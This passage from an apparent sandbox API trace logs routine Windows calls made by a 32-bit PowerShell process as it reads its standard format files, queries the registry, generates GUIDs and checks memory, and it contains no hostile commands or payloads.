lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.796] GetLastError () returned 0x0 [0089.796] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.796] GetLastError () returned 0x0 [0089.796] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.796] GetLastError () returned 0x0 [0089.796] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.797] GetLastError () returned 0x0 [0089.797] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.797] GetLastError () returned 0x0 [0089.797] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.797] GetLastError () returned 0x0 [0089.797] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.797] GetLastError () returned 0x0 [0089.798] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.798] GetLastError () returned 0x0 [0089.798] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.798] GetLastError () returned 0x0 [0089.798] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.798] GetLastError () returned 0x0 [0089.798] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.798] GetLastError () returned 0x0 [0089.798] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.798] GetLastError () returned 0x0 [0089.798] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.798] GetLastError () returned 0x0 [0089.800] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.800] GetLastError () returned 0x0 [0089.800] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0xbce, lpOverlapped=0x0) returned 1 [0089.800] GetLastError () returned 0x0 [0089.800] ReadFile (in: hFile=0x324, lpBuffer=0x30b7b02, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b7b02*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.800] GetLastError () returned 0x0 [0089.800] ReadFile (in: hFile=0x324, lpBuffer=0x30b8394, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x30b8394*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.800] GetLastError () returned 0x0 [0089.800] CloseHandle (hObject=0x324) returned 1 [0089.800] GetLastError () returned 0x0 [0089.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.800] GetLastError () returned 0x0 [0089.801] SetErrorMode (uMode=0x1) returned 0x1 [0089.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x30d9390 | out: lpFileInformation=0x30d9390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0089.801] GetLastError () returned 0x0 [0089.801] SetErrorMode (uMode=0x1) returned 0x1 [0089.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.801] GetLastError () returned 0x0 [0089.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e488 | out: phkResult=0x13e488*=0x324) returned 0x0 [0089.801] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x0, lpcbData=0x13e4cc*=0x0 | out: lpType=0x13e4d0*=0x1, lpData=0x0, lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.801] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e4d0, lpData=0x3953b0, lpcbData=0x13e4cc*=0x56 | out: lpType=0x13e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e4cc*=0x56) returned 0x0 [0089.801] RegCloseKey (hKey=0x324) returned 0x0 [0089.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.801] GetLastError () returned 0x0 [0089.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0089.801] GetLastError () returned 0x0 [0089.804] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb139ac5f, Data2=0xd433, Data3=0x43ae, Data4=([0]=0xb6, [1]=0x1d, [2]=0xaa, [3]=0x62, [4]=0xe3, [5]=0x66, [6]=0x78, [7]=0x8b))) returned 0x0 [0089.804] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x50ec6fd9, Data2=0xed23, Data3=0x429a, Data4=([0]=0x92, [1]=0xcc, [2]=0x95, [3]=0x8b, [4]=0x17, [5]=0x8e, [6]=0xed, [7]=0x51))) returned 0x0 [0089.804] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xa4f34b8f, Data2=0x6d55, Data3=0x4f1a, Data4=([0]=0x96, [1]=0xb4, [2]=0x39, [3]=0xdd, [4]=0x32, [5]=0xb5, [6]=0xb1, [7]=0x88))) returned 0x0 [0089.804] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xc48ff20, Data2=0xd82, Data3=0x499f, Data4=([0]=0xb5, [1]=0x1f, [2]=0xd1, [3]=0xa7, [4]=0x71, [5]=0xa1, [6]=0xd5, [7]=0x3a))) returned 0x0 [0089.804] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9a052c58, Data2=0xd118, Data3=0x46ca, Data4=([0]=0x89, [1]=0xd5, [2]=0x67, [3]=0x31, [4]=0x49, [5]=0x42, [6]=0xa4, [7]=0x71))) returned 0x0 [0089.805] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x20bf8387, Data2=0xcef5, Data3=0x4c4b, Data4=([0]=0xab, [1]=0x28, [2]=0x26, [3]=0x6, [4]=0x6c, [5]=0x6d, [6]=0xf2, [7]=0xac))) returned 0x0 [0089.805] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.805] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x61761474, Data2=0xd55f, Data3=0x4eb7, Data4=([0]=0x8f, [1]=0x63, [2]=0x5f, [3]=0x62, [4]=0x4, [5]=0xc9, [6]=0xa, [7]=0x1b))) returned 0x0 [0089.805] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.805] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.805] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x5c03eb12, Data2=0xe14d, Data3=0x4d88, Data4=([0]=0x88, [1]=0x25, [2]=0xd4, [3]=0x82, [4]=0x2, [5]=0x6f, [6]=0xb, [7]=0xb9))) returned 0x0 [0089.805] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x278a1b31, Data2=0x221b, Data3=0x4c75, Data4=([0]=0xad, [1]=0xf3, [2]=0xc3, [3]=0xa3, [4]=0xc9, [5]=0xf5, [6]=0x22, [7]=0x3e))) returned 0x0 [0089.806] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x29949ab, Data2=0x4260, Data3=0x4544, Data4=([0]=0xb4, [1]=0x68, [2]=0x7d, [3]=0x54, [4]=0x69, [5]=0x78, [6]=0xad, [7]=0x87))) returned 0x0 [0089.806] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x8ee5f978, Data2=0x22ce, Data3=0x4248, Data4=([0]=0xae, [1]=0x13, [2]=0xfd, [3]=0x8b, [4]=0x7d, [5]=0xbd, [6]=0x1e, [7]=0xb4))) returned 0x0 [0089.806] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.806] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe3c0028, Data2=0x68a6, Data3=0x4bae, Data4=([0]=0x94, [1]=0xbf, [2]=0x39, [3]=0xa7, [4]=0x2c, [5]=0xf6, [6]=0xb3, [7]=0xb3))) returned 0x0 [0089.806] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.806] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.807] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.807] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.807] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.808] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xf24f05ed, Data2=0xf2d2, Data3=0x4fd6, Data4=([0]=0x8f, [1]=0x2f, [2]=0xec, [3]=0xef, [4]=0xcd, [5]=0xe1, [6]=0xc6, [7]=0x3c))) returned 0x0 [0089.808] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x3f5994e7, Data2=0x8ead, Data3=0x4c3b, Data4=([0]=0x8c, [1]=0x64, [2]=0x8, [3]=0x4b, [4]=0x23, [5]=0xf8, [6]=0x89, [7]=0xfe))) returned 0x0 [0089.808] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x7e03e4fc, Data2=0x75b5, Data3=0x4394, Data4=([0]=0x85, [1]=0xe, [2]=0x84, [3]=0xb9, [4]=0xd, [5]=0x4e, [6]=0xea, [7]=0x6))) returned 0x0 [0089.808] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xf12442ec, Data2=0x33da, Data3=0x4d06, Data4=([0]=0x88, [1]=0xfe, [2]=0xd7, [3]=0x21, [4]=0xa0, [5]=0xb, [6]=0xf, [7]=0x3a))) returned 0x0 [0089.808] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x11e25fe7, Data2=0xe891, Data3=0x4e7a, Data4=([0]=0xba, [1]=0xa2, [2]=0x9f, [3]=0xf7, [4]=0x88, [5]=0x9, [6]=0x1d, [7]=0xfe))) returned 0x0 [0089.808] VirtualQuery (in: lpAddress=0x13d384, lpBuffer=0x13e384, dwLength=0x1c | out: lpBuffer=0x13e384*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.808] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xf4c10a64, Data2=0x8fe5, Data3=0x472b, Data4=([0]=0x8c, [1]=0x39, [2]=0x26, [3]=0x42, [4]=0x5a, [5]=0x11, [6]=0xa, [7]=0x23))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9228c1fa, Data2=0x55c5, Data3=0x447b, Data4=([0]=0xa4, [1]=0xf8, [2]=0x69, [3]=0xed, [4]=0x8a, [5]=0x85, [6]=0xb9, [7]=0xa6))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x7f1c938a, Data2=0x3693, Data3=0x4a15, Data4=([0]=0x9d, [1]=0x64, [2]=0x1e, [3]=0xcb, [4]=0x71, [5]=0xef, [6]=0xae, [7]=0xd0))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xd668c126, Data2=0xbd6f, Data3=0x4432, Data4=([0]=0x96, [1]=0x9f, [2]=0xd6, [3]=0xed, [4]=0xa5, [5]=0x2f, [6]=0x1, [7]=0xb6))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x7ea9abe5, Data2=0x7a1d, Data3=0x4f9c, Data4=([0]=0xb4, [1]=0xc6, [2]=0x76, [3]=0x54, [4]=0x5f, [5]=0x72, [6]=0xc7, [7]=0x56))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb22c3897, Data2=0x9dc7, Data3=0x41a0, Data4=([0]=0x92, [1]=0x24, [2]=0xf8, [3]=0x2, [4]=0xc3, [5]=0xd6, [6]=0xb, [7]=0x8a))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x5d1e7865, Data2=0xb173, Data3=0x4c5f, Data4=([0]=0x92, [1]=0xa4, [2]=0xd1, [3]=0xe5, [4]=0x69, [5]=0x2d, [6]=0xb3, [7]=0xf7))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9429227d, Data2=0xe5cc, Data3=0x4e4e, Data4=([0]=0x93, [1]=0xed, [2]=0x95, [3]=0x87, [4]=0x32, [5]=0x45, [6]=0xd, [7]=0x8f))) returned 0x0 [0089.809] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x6b934f5e, Data2=0xdc0c, Data3=0x4ec8, Data4=([0]=0x86, [1]=0x45, [2]=0xf, [3]=0x74, [4]=0xc9, [5]=0xa4, [6]=0xa3, [7]=0xe4))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x833ce117, Data2=0x4c81, Data3=0x4cf0, Data4=([0]=0x97, [1]=0x85, [2]=0x41, [3]=0x92, [4]=0x13, [5]=0xbf, [6]=0xa, [7]=0x6b))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x95ea0fc6, Data2=0x8704, Data3=0x480d, Data4=([0]=0xa2, [1]=0xfe, [2]=0xa6, [3]=0x4c, [4]=0x6d, [5]=0x84, [6]=0x71, [7]=0x69))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x7d553c3c, Data2=0x51e6, Data3=0x44e9, Data4=([0]=0xa9, [1]=0x19, [2]=0xe6, [3]=0x41, [4]=0xc9, [5]=0xd4, [6]=0xc0, [7]=0x9e))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x72562bd4, Data2=0x834b, Data3=0x4a86, Data4=([0]=0x83, [1]=0x96, [2]=0x31, [3]=0xa, [4]=0x8f, [5]=0xaf, [6]=0x61, [7]=0x7))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x4d1f89d4, Data2=0x5af6, Data3=0x4b65, Data4=([0]=0xb7, [1]=0x95, [2]=0x8a, [3]=0x92, [4]=0xf5, [5]=0x92, [6]=0x9d, [7]=0xba))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb3401f64, Data2=0xbe06, Data3=0x487a, Data4=([0]=0xa6, [1]=0xdb, [2]=0x9e, [3]=0x6d, [4]=0xb3, [5]=0x4a, [6]=0x7e, [7]=0xf3))) returned 0x0 [0089.810] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x29065c25, Data2=0x78cf, Data3=0x4f33, Data4=([0]=0xb7, [1]=0xc7, [2]=0xe2, [3]=0x8e, [4]=0x94, [5]=0x20, [6]=0x49, [7]=0xcb))) returned 0x0 [0089.811] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xafe7f5da, Data2=0x9b68, Data3=0x4794, Data4=([0]=0x8e, [1]=0xa6, [2]=0x9c, [3]=0x58, [4]=0x27, [5]=0xf7, [6]=0x19, [7]=0x7e))) returned 0x0 [0089.811] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x6645752a, Data2=0xdfdc, Data3=0x4fb9, Data4=([0]=0xb3, [1]=0x3c, [2]=0x3f, [3]=0xa, [4]=0x17, [5]=0x43, [6]=0x5b, [7]=0xc0))) returned 0x0 [0089.811] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x99c00342, Data2=0xe552, Data3=0x4741, Data4=([0]=0xb5, [1]=0x3d, [2]=0xe1, [3]=0x39, [4]=0x11, [5]=0x67, [6]=0x83, [7]=0xad))) returned 0x0 [0089.811] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.811] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.816] VirtualQuery (in: lpAddress=0x13d230, lpBuffer=0x13e230, dwLength=0x1c | out: lpBuffer=0x13e230*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.818] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x3b31c318, Data2=0x15f1, Data3=0x4272, Data4=([0]=0x98, [1]=0x5a, [2]=0xa0, [3]=0x62, [4]=0x6e, [5]=0x74, [6]=0x28, [7]=0xd3))) returned 0x0 [0089.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0089.818] GetLastError () returned 0x0 [0089.818] SetErrorMode (uMode=0x1) returned 0x1 [0089.818] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0089.818] GetLastError () returned 0x0 [0089.818] GetFileType (hFile=0x324) returned 0x1 [0089.818] SetErrorMode (uMode=0x1) returned 0x1 [0089.818] GetFileType (hFile=0x324) returned 0x1 [0089.818] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.820] GetLastError () returned 0x0 [0089.820] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.820] GetLastError () returned 0x0 [0089.821] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.821] GetLastError () returned 0x0 [0089.821] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.821] GetLastError () returned 0x0 [0089.822] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.822] GetLastError () returned 0x0 [0089.822] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x1000, lpOverlapped=0x0) returned 1 [0089.822] GetLastError () returned 0x0 [0089.822] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x119, lpOverlapped=0x0) returned 1 [0089.822] GetLastError () returned 0x0 [0089.822] ReadFile (in: hFile=0x324, lpBuffer=0x317627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e504, lpOverlapped=0x0 | out: lpBuffer=0x317627c*, lpNumberOfBytesRead=0x13e504*=0x0, lpOverlapped=0x0) returned 1 [0089.822] GetLastError () returned 0x0 [0089.822] CloseHandle (hObject=0x324) returned 1 [0089.822] GetLastError () returned 0x0 [0089.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0089.822] GetLastError () returned 0x0 [0089.822] SetErrorMode (uMode=0x1) returned 0x1 [0089.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3197278 | out: lpFileInformation=0x3197278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0089.822] GetLastError () returned 0x0 [0089.822] SetErrorMode (uMode=0x1) returned 0x1 [0089.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x13e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0089.822] GetLastError () returned 0x0 [0089.822] 